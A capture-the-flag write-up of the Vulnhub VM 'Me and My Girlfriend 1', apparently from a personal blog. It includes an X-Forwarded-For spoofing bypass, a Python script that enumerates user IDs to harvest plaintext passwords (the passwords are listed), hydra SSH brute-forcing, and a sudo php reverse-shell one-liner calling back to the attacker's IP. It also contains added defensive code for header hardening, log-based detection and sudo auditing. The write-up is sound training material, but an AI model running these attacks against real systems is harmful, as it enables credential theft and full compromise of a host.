Yoga7xm's Blog

Vulnhub: Me and My Girlfriend 1

2019/02/10

Abstract

Target VM: link

Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

The description says this is a beginner-level box with two flag files.

Environment setup

Download VMware OVF Tool and install it into the VMware directory; the .ova file can then be imported through VMware's add-virtual-machine dialog. After that, scan for live hosts to find the target's IP.

  • Target: 192.168.134.131
  • Kali: 192.168.134.128
  • Win10: 192.168.134.1

Play

Information gathering

➜  vulnhub nmap -p- -T4 -sV 192.168.134.131 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 15:28 CST
Nmap scan report for localhost (192.168.134.131)
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:1D:F7:15 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.78 seconds

Only ports 80 and 22 are open. The usual approach is to collect some credentials through port 80, then brute-force the SSH service to get a shell.

Opening the web service directly shows a message saying an IP address must be supplied in the X-Forwarded-For header. That is easy: set the header with the ModHeader plugin and visit again.
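The access check described above trusts a header the client can set freely, which is why a browser plugin is enough to pass it. The following added example (not code from the VM or from this write-up) models both that check and a proxy-aware version: X-Forwarded-For is honoured only when the TCP peer is a trusted proxy, and even then the right-most untrusted hop is used, because proxies append to the header while a client can only prepend. The 10.0.0.0/8 proxy range and the loopback-only rule are assumptions for the example.

```python
import ipaddress
from typing import Optional

# Assumption for this example: the only legitimate source of X-Forwarded-For is a
# reverse proxy in this range. Adjust to the real deployment.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def vulnerable_client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """The pattern the VM uses: the header is believed unconditionally, so any
    client can claim to be 127.0.0.1 and pass an 'internal only' check."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def _trusted(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def hardened_client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and then
    take the right-most hop that is not itself a trusted proxy."""
    if not _trusted(ipaddress.ip_address(remote_addr)):
        return remote_addr  # direct connection: the header is client-controlled, ignore it
    if not xff:
        return remote_addr
    for hop in reversed([h.strip() for h in xff.split(",") if h.strip()]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # malformed header: fall back to the peer address
        if not _trusted(addr):
            return hop
    return remote_addr


def is_internal_request(remote_addr: str, xff: Optional[str]) -> bool:
    """The loopback-only decision the VM's page makes, evaluated on the hardened value."""
    return ipaddress.ip_address(hardened_client_ip(remote_addr, xff)).is_loopback


if __name__ == "__main__":
    # A direct client claiming to be loopback via the header.
    print(vulnerable_client_ip("192.168.134.128", "127.0.0.1"))   # believed
    print(hardened_client_ip("192.168.134.128", "127.0.0.1"))     # ignored
    print(is_internal_request("192.168.134.128", "127.0.0.1"))
```

If the application is never deployed behind a proxy, the simplest fix is to use the peer address alone and not read the header at all.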

I registered an account, yoga, and logged in. After clicking around everywhere, I found a change-password function.

A quick test showed that this page identifies the user solely by the user_id parameter.
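Selecting a record by a client-supplied user_id with no ownership check is an insecure direct object reference, and here it is made worse by the form echoing the stored password back. The added example below (mine, not code from the VM or this write-up) shows the flawed lookup beside a version that ties the lookup to the session and never returns the password, and then a small detector that scans Apache access logs for a client walking through profile ids. The user table, the log lines and the threshold of five distinct ids are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed stand-in for the application's user table (not the VM's real data).
USERS = {
    1: {"username": "alice", "password": "constructed-secret-1"},
    2: {"username": "bob", "password": "constructed-secret-2"},
    3: {"username": "yoga", "password": "constructed-secret-3"},
}


class Forbidden(Exception):
    pass


def vulnerable_profile(session_user_id: int, requested_user_id: int) -> Optional[dict]:
    """Same flaw as the page describes: the record is chosen by the user_id query
    parameter alone and the stored password is echoed back into the form."""
    return USERS.get(requested_user_id)


def hardened_profile(session_user_id: int, requested_user_id: int) -> dict:
    """Ownership check: the authenticated session decides whose profile may be
    read, and the password field is never returned (it should be a hash anyway)."""
    if session_user_id != requested_user_id:
        raise Forbidden(f"user {session_user_id} may not read profile {requested_user_id}")
    record = USERS.get(requested_user_id)
    if record is None:
        raise KeyError(requested_user_id)
    return {k: v for k, v in record.items() if k != "password"}


def try_profile(session_user_id: int, requested_user_id: int) -> Optional[dict]:
    """Convenience wrapper: None when the hardened check refuses or the id is unknown."""
    try:
        return hardened_profile(session_user_id, requested_user_id)
    except (Forbidden, KeyError):
        return None


# Combined-log-format request line carrying the profile endpoint's user_id parameter.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"GET /index\.php\?page=profile&user_id=(?P<uid>\d+)[^"]*" (?P<status>\d{3})'
)

# Constructed Apache access log lines modelled on the enumeration this page describes; not a real capture.
SAMPLE_LOG = """\
192.168.134.128 - - [26/Jan/2019:15:40:01 +0800] "GET /index.php?page=profile&user_id=1 HTTP/1.1" 200 1532
192.168.134.128 - - [26/Jan/2019:15:40:01 +0800] "GET /index.php?page=profile&user_id=2 HTTP/1.1" 200 1530
192.168.134.128 - - [26/Jan/2019:15:40:01 +0800] "GET /index.php?page=profile&user_id=3 HTTP/1.1" 200 1534
192.168.134.128 - - [26/Jan/2019:15:40:02 +0800] "GET /index.php?page=profile&user_id=4 HTTP/1.1" 200 1536
192.168.134.128 - - [26/Jan/2019:15:40:02 +0800] "GET /index.php?page=profile&user_id=5 HTTP/1.1" 200 1529
192.168.134.128 - - [26/Jan/2019:15:40:02 +0800] "GET /index.php?page=profile&user_id=11 HTTP/1.1" 404 290
192.168.134.1 - - [26/Jan/2019:15:41:10 +0800] "GET /index.php?page=profile&user_id=7 HTTP/1.1" 200 1529
192.168.134.1 - - [26/Jan/2019:15:41:12 +0800] "GET /index.php?page=dashboard HTTP/1.1" 200 2210
"""


def find_enumerators(log_text: str, threshold: int = 5) -> Dict[str, List[int]]:
    """Return {client_ip: sorted distinct user_ids} for clients that requested at
    least `threshold` different profiles. A legitimate user only needs its own
    profile, so a client stepping through ids is the signature to alert on."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            seen[m["ip"]].add(int(m["uid"]))
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}


if __name__ == "__main__":
    print(vulnerable_profile(3, 1))   # yoga's session reads alice's record, password included
    print(try_profile(3, 1))          # None: refused
    print(try_profile(1, 1))          # {'username': 'alice'}
    print(find_enumerators(SAMPLE_LOG))
```

Failed lookups (the 404 for user_id=11) are counted as well, since probing ids that do not exist is itself part of the pattern.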

Exploitation

Iterate over the ids with a Python script to collect every username and password

import requests
from bs4 import BeautifulSoup

if __name__ == "__main__":
    for id in range(1, 12):
        url = "http://192.168.134.131/index.php?page=profile&user_id=" + str(id)
        headers = {
            # session cookie of the registered account; the app needs the XFF header too
            "Cookie": "PHPSESSID=4jbr8i0af7o0o4sk4he61919i6",
            "x-forwarded-for": "127.0.0.1",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
            "Connection": "close"
        }
        resp = requests.get(url=url, headers=headers)
        if resp.status_code != 200:  # `is not 200` compared identity, not value
            continue
        html = BeautifulSoup(resp.content.decode('UTF-8'), 'html.parser')

        # the profile form pre-fills both fields, including the plaintext password
        username_field = html.find('input', id='username')
        password_field = html.find('input', id='password')
        if username_field is None or password_field is None:
            continue
        username = username_field['value']
        passwd = password_field['value']
        if username:
            # user:pass format that hydra expects
            print(username + ":" + passwd)

Running it produces:

eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
yoga:yoga

Save them to a txt file, then brute-force with hydra

This yields alice's credentials, so log in over SSH directly
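The hydra run above works because the web credentials were reused for the system account, and it leaves a distinctive trace in sshd's log: a burst of failures from one source followed by an accepted login. The added example below (not from the VM or the write-up) parses constructed auth.log lines in the OpenSSH 6.6 format seen on the target, flags any source with a burst of failed logins inside a time window, and reports which accounts that source then logged into successfully. The log lines, the year (syslog timestamps carry none), the window and the threshold are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed auth.log excerpt; not a real capture from the VM.
SAMPLE_AUTH_LOG = """\
Jan 26 15:45:01 gfriEND sshd[2101]: Failed password for invalid user eweuhtandingan from 192.168.134.128 port 40210 ssh2
Jan 26 15:45:01 gfriEND sshd[2103]: Failed password for invalid user aingmaung from 192.168.134.128 port 40212 ssh2
Jan 26 15:45:02 gfriEND sshd[2105]: Failed password for invalid user sundatea from 192.168.134.128 port 40214 ssh2
Jan 26 15:45:02 gfriEND sshd[2107]: Failed password for invalid user sedihaingmah from 192.168.134.128 port 40216 ssh2
Jan 26 15:45:03 gfriEND sshd[2109]: Accepted password for alice from 192.168.134.128 port 40218 ssh2
Jan 26 15:45:03 gfriEND sshd[2111]: Failed password for invalid user abdikasepak from 192.168.134.128 port 40220 ssh2
Jan 26 16:10:40 gfriEND sshd[2300]: Failed password for alice from 192.168.134.1 port 50001 ssh2
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)'
)

Event = Tuple[datetime, str, str, str]  # (timestamp, source ip, result, user)


def parse_auth_log(log_text: str, year: int = 2019) -> List[Event]:
    """Turn sshd password-auth lines into events; the year is assumed because syslog omits it."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["result"], m["user"]))
    return events


def detect_bruteforce(log_text: str, threshold: int = 4,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, dict]:
    """Return {ip: {"failures": n, "compromised_users": [...]}} for sources with at
    least `threshold` failed logins inside `window`, listing accounts that the same
    source then logged into successfully."""
    by_ip = defaultdict(list)
    for ev in parse_auth_log(log_text):
        by_ip[ev[1]].append(ev)

    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        failures = [e[0] for e in events if e[2] == "Failed"]
        # sliding window: does any failure start a run of `threshold` within `window`?
        burst = any(
            sum(1 for t in failures[i:] if t - start <= window) >= threshold
            for i, start in enumerate(failures)
        )
        if not burst:
            continue
        successes = sorted({e[3] for e in events if e[2] == "Accepted"})
        alerts[ip] = {"failures": len(failures), "compromised_users": successes}
    return alerts


if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_AUTH_LOG))
```

A source that trips the threshold with an empty compromised_users list is a failed attempt worth blocking; a non-empty list is an incident. The single failure from 192.168.134.1 stays below the threshold and is not reported.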

flag1 is in the hidden folder .my_secret under the current user's home directory

Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

It hints that we need to escalate to root to get the second flag

Privilege escalation

Check which commands this user can run with sudo

alice@gfriEND:~/.my_secret$ sudo -l
Matching Defaults entries for alice on gfriEND:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
(root) NOPASSWD: /usr/bin/php

Case closed: root can be obtained directly through php

sudo php -r '$sock=fsockopen("192.168.134.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Upgrade to an interactive tty shell, enter the root directory, and grab flag2!!!!
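The whole escalation hinges on one sudoers line: a NOPASSWD rule for an interpreter that can run arbitrary code as root. That is a misconfiguration an auditor can find mechanically. The added example below (not from the VM or the write-up) parses the `sudo -l` output shown above and flags rules that hand out a root shell. The list of shell-capable binaries and the two extra sample rules (cat, vim) are constructed assumptions for the example; the php rule is the one from this box.

```python
import re
from typing import Dict, List

# Binaries that give the caller arbitrary code execution when run as root.
# Constructed, non-exhaustive list for this audit; extend it for your environment.
SHELL_CAPABLE = {"php", "python", "python2", "python3", "perl", "ruby", "node",
                 "bash", "sh", "vim", "vi", "less", "more", "find", "awk", "env"}

# sudo -l output: the php rule is the one from this box, the other two are constructed.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
    (root) /bin/cat /var/log/apache2/access.log
    (root) /usr/bin/vim
"""

# "(runas) TAG: TAG: cmd, cmd" lines in the "may run the following commands" section
SUDO_L_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_l(output: str) -> List[Dict]:
    """Parse the command rules of `sudo -l` into {runas, tags, command} entries."""
    entries = []
    in_cmds = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = SUDO_L_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(","):
            entries.append({"runas": m["runas"].strip(), "tags": tags, "command": cmd.strip()})
    return entries


def audit(entries: List[Dict]) -> List[str]:
    """Flag rules that run as root and are either unrestricted (ALL) or a shell-capable binary."""
    findings = []
    for e in entries:
        if "root" not in e["runas"] and "ALL" not in e["runas"]:
            continue
        cmd = e["command"]
        if cmd == "ALL":
            findings.append(f"{cmd}: unrestricted root")
            continue
        base = cmd.split()[0].rsplit("/", 1)[-1]
        if base in SHELL_CAPABLE:
            pw = "without a password" if "NOPASSWD" in e["tags"] else "with a password"
            findings.append(f"{cmd}: {base} can spawn a root shell ({pw})")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The fix on a box like this is to remove the rule or replace the bare interpreter with a wrapper script that takes no user-controlled arguments; the cat rule is not flagged by this check because it cannot be turned into a shell, though it still grants root-level file reads and deserves its own review.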
